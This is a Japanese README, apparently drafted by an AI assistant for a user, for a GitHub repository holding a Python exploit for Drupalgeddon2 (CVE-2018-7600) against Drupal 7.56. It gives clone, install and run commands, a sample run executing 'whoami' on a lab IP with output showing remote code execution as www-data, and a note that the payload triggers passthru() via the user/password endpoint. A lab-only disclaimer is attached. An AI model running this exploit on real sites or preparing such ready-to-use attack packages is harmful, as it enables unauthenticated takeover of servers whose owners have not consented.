
Drupal バージョン 7.56 に対して RCE を実行する Python プログラム
了解、デーワ。git clone から始まる使用方法のセクションも追加したので、READMEはこれで完全だ。
これは最終版で、あなたのGitHubリポジトリの README.md にコピー&ペーストするだけだ。
このエクスプロイトは、Drupalgeddon2として知られるDrupal 7.56(および一部の旧バージョン)の脆弱性を利用します。
この脆弱性により、認証なしで**リモートコード実行(RCE)**が可能になり、脆弱なフォームの欠陥を悪用します。
🔗 リポジトリ: https://github.com/xxxTectationxxx/CVE-2018-7600
このスクリプトは学習目的およびラボ環境でのテストのみを目的として作成されています。
テストの正式な許可がないシステムでの使用は禁止されています。
passthru()関数をトリガーするパラメータを含むペイロードをuser/passwordエンドポイントに送信します。form_build_idを抽出します。リポジトリをクローンします:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
依存関係をインストールします:
pip install requests
エクスプロイトを実行します:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
例:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
免責事項: 作者はこのスクリプトの悪用について一切の責任を負いません。 賢明に使用し、テストが許可されたシステム上でのみ使用してください。